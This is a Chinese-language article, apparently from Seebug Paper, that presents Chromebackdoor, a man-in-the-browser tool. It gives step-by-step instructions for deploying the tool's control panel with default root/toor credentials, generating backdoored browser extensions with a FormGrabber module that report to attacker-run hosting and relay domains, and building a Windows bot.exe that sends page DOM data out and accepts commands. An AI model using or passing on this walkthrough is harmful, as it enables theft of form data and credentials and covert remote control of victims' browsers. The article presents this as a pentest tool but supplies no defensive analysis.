项目地址:https://github.com/graniet/chromebackdoor

Chromebackdoor 是一款渗透测试工具,该工具使用 MITB 技术生成Windows可执行文件 “.exe”,启动程序会运行恶意的插件扩展,或运行支持主流浏览器的脚本,并发送所有 DOM 数据以执行命令进行控制。

安装方法

环境要求:
pip install crxmake
wine32
python chromebackdoor.py

安装web

1) 首先解压生成的 chromebackdook

unzip folder.zip

2) 上传 web 文件夹至服务器

3) 创建数据库和用户,更新配置文件 对应路径

/web/includes/config.php

4) 数据库导入 .SQL 文件

/SQL/chromebackdoor.sql

5) 登录 Web 面板 (web/index.php)

username = root
password = toor
生成被控端(不通过 .exe)

安装依赖 & python chromebackdoor.py

python chromebackdoor.py

可以给各大主流浏览器生成后门。

比如 Google Chrome:

python chromebackdoor.py --chrome

这时需要输入域名 (需要 SSL):

[?] Website hosted (https://localhost/)? https://lynxframework.com/

relais (需要SSL):

[?] Website relais url (https://localhost/relais)? https://lynxrelay.com/relais
or use same domain
[?] Website relais url (https://localhost/relais)? https://lynxframework.com/relais
[?] Information correct [Y/n]? Y

选择模块 (比如 FormGrabber V1.0)

[?] please select numbers ? 2

该脚本生成了 .crx .perm 和后门文件夹

构建 .exe

1) 使用 --build 参数

python chromebackdoor.py --build

2) 选择后门 (比如 --chrome)

[?] crx fime (/root/..) ? /root/backdoor.crx

3) wine 启动 installer.exe 生成 bot.exe

Generate successful : {chromebackdoor_folder}/bot.exe

4) 用 Windows 启动 bot.exe

Web 控制端界面:


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:http://paper.seebug.org/171/